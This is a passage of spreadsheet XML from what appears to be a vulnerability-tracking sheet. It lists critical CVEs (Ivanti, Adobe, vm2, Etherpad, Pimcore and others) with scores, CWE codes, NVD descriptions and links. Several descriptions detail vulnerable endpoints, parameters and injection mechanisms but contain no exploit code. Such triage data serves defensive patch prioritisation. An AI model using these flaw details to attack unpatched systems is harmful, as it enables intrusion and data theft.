          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87827</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12645</t>
        </is>
      </c>
      <c r="C46" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12646</t>
        </is>
      </c>
      <c r="C47" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12647</t>
        </is>
      </c>
      <c r="C48" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12650</t>
        </is>
      </c>
      <c r="C49" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="C50" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19583</t>
        </is>
      </c>
      <c r="C51" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>Velociraptor allows some sensitive artifacts to be gated by additional permissions. For example, the Linux.Sys.BashShell artifact allows arbitrary command execution on endpoints, and so it requires the EXECVE permission to schedule. However, no such check was implemented for client monitoring artifacts. Additionally there was no requirement that client monitoring artifacts carry the CLIENT_EVENTS type. This allows any user who can schedule client monitoring artifacts to also schedule otherwise restricted artifacts (such as Linux.Sys.BashShell).</t>
        </is>
      </c>
      <c r="M51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19583</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22797</t>
        </is>
      </c>
      <c r="C52" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr">
        <is>
          <t>2026-01-19</t>
        </is>
      </c>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.</t>
        </is>
      </c>
      <c r="M52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22797</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="C53" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G53" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="M53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47686</t>
        </is>
      </c>
      <c r="C54" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G54" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, handleException() in lib/setup-sandbox.js sanitizes SuppressedError.error, SuppressedError.suppressed, and AggregateError.errors but does not sanitize Error.cause, allowing sandbox code to obtain a powerful host object such as process from an embedder-exposed host function that throws an error with that object as its cause and then execute arbitrary host commands. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47686</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48086</t>
        </is>
      </c>
      <c r="C55" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, a TENANT_ADMIN promotes themselves to platform-wide GLOBAL_ADMIN through a single PUT request. The role-update handler accepts the `GLOBAL_ADMIN` enum value from any tenant admin updating their own tenant's staff. No policy check enforces that "only an existing GLOBAL_ADMIN may grant GLOBAL_ADMIN", so the schema validation IS the authorization decision. After re-login, the JWT contains the new role and the formerly-tenant-scoped admin reaches every other tenant on the platform. On the hosted OpenReception service this is a scope-changed escalation: a single customer-side tenant administrator gains full platform-wide administrative control over all other tenants' configuration, users, staff records, operational metadata, and tenant lifecycle. Plaintext appointment contents remain subject to the E2E model unless chained with the staff-crypto poisoning issue (V-4) or with staff-passkey hijacking (V-1). On a single-tenant self-hosted deployment it is still a privilege escalation because TENANT_ADMIN should not be able to create new tenants, modify global configuration, or manage other administrators. The same handler also accepts updates targeted at any colleague within the tenant. A tenant admin can promote a separate collaborator account instead of themselves, leaving their own audit trail clean while the platform-wide breach happens through a separate identity. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48086</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48273</t>
        </is>
      </c>
      <c r="C56" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48765</t>
        </is>
      </c>
      <c r="C57" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege read collaborator to extract a workspace OAuth `credentialsId` from a readable bot configuration and then overwrite that credential through `handleUpdateOAuthCredentials()` by supplying an attacker-controlled writable `workspaceId`. The update path validates only the attacker-supplied workspace and then updates the credential record by global `id` alone, while also rewriting the credential's `workspaceId`. This allows cross-workspace OAuth credential takeover and reassignment. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48765</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51366</t>
        </is>
      </c>
      <c r="C58" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in Bottinelli Informatica Vedo Suite v.1.2.5 allows a remote attacker to execute arbitrary code via the api_vedo/chat endpoint and the utente_chat parameter</t>
        </is>
      </c>
      <c r="M58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51366</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52855</t>
        </is>
      </c>
      <c r="C59" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G59" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.12.3, {{config.}} placeholders in egg configuration-file templates allow a low-privileged user to read {{config.token}}, {{config.token_id}}, and {{config.docker.registries}} from the full daemon configuration. This issue is fixed in version 1.12.3.</t>
        </is>
      </c>
      <c r="M59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52855</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54680</t>
        </is>
      </c>
      <c r="C60" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G60" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>Logging operator automates the deployment and configuration of Kubernetes logging pipelines. Prior to 6.6.0, the Fluentd configuration renderer FluentRender in pkg/sdk/logging/model/render/fluent.go writes CRD strings such as Flow record_transformer.records values directly into fluent.conf without escaping, allowing a user who can create Flow resources to inject a Fluentd &lt;match **&gt; block using @type exec and execute arbitrary commands inside the Fluentd aggregator. This issue is fixed in version 6.6.0.</t>
        </is>
      </c>
      <c r="M60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54680</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55089</t>
        </is>
      </c>
      <c r="C61" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. From 2.1.0 until 3.1.0, Etherpad's src/node/handler/APIHandler.ts authorizes requests to /api/2/* in the authorization_code OAuth path by using requiredClaims with the admin claim. This check requires only that the claim exists, while src/node/security/OAuth2Provider.ts issues admin: false for configured non-admin users. A non-admin user with a valid signed token can therefore invoke administrative functions including setHTML, setText, appendText, deletePad, copyPad, movePad, restoreRevision, anonymizeAuthor, listAllPads, and listAuthorsOfPad, allowing disclosure, modification, or deletion of pads across the instance. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55089</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55166</t>
        </is>
      </c>
      <c r="C62" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639, CWE-918</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, authenticated users could influence an ACME authority acme_url without an effective server-side destination restriction and trigger AcmeHandler.setup_acme_client to make backend requests. An attacker could target cloud instance metadata or internal services from Lemur network context, potentially obtaining credentials available to the host. The advisory also identifies creator-equality authorization behavior that could preserve access to certificate key material after ownership or role changes, with insufficient export_private_key audit context to distinguish that access path. Together, the acme_url server-side request forgery and authorization weakness could expose cloud credentials and long-lived PKI private-key access. The fix adds ACME_DIRECTORY_HOST_ALLOWLIST validation and enriches key-export audit events with creator and current-owner context. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55166</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55565</t>
        </is>
      </c>
      <c r="C63" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G63" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs LikeExpression.fillCode_getValueReturn in yamcs-core/src/main/java/org/yamcs/yarch/streamsql/LikeExpression.java inserts an unescaped LIKE pattern into Java source compiled by Expression.getCompiledExpression through SimpleCompiler.cook instead of applying ValueExpression.escapeJavaString. The pattern can originate from POST /api/archive/{instance}:executeSql, POST /api/archive/{instance}:streamSql, POST /api/archive/{instance}/tables/{table}:readRows, GET /api/archive/{instance}/events, or activity searches, including paths available with ReadTables, ReadEvents, or ReadActivities. A quote in the pattern can inject Java that runs as the Yamcs server process. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55565</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55634</t>
        </is>
      </c>
      <c r="C64" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-94</t>
        </is>
      </c>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, the class-definition import endpoint /pimcore-studio/api/class/definition/configuration-view/detail/{id}/import accepts a DataObject field name that is emitted without an identifier allowlist by lib/DataObject/ClassBuilder/FieldDefinitionPropertiesBuilder.php into generated PHP properties and by models/DataObject/ClassDefinition/Helper/Dao.php into ALTER TABLE identifiers. An authenticated user with the objects permission can inject PHP syntax into the generated DataObject class, causing attacker-controlled code in generated var/classes/DataObject/.php files to run when an object of that class is instantiated, and can also inject SQL identifier content into schema-changing statements. The central models/DataObject/ClassDefinition/Data.php::setName() validation did not reject semicolons, braces, backticks, spaces, or other non-identifier characters. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="M64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55634</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62283</t>
        </is>
      </c>
      <c r="C65" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&amp;M tool. Nezha versions 1.14.13 through 1.14.14 and 2.0.0 through 2.0.9 do not bind stream identifiers created by CreateStream in service/rpc/io_stream.go to their creating user, and `GET /ws/terminal/:id` and `GET /ws/file/:id` only check whether the supplied UUID exists. An authenticated RoleMember who obtains a live stream UUID from logs, browser history, referer data, or telemetry can attach to another user's terminal or file-manager session, read and write target-server files, and execute shell commands. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="M65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62283</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65818</t>
        </is>
      </c>
      <c r="C66" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
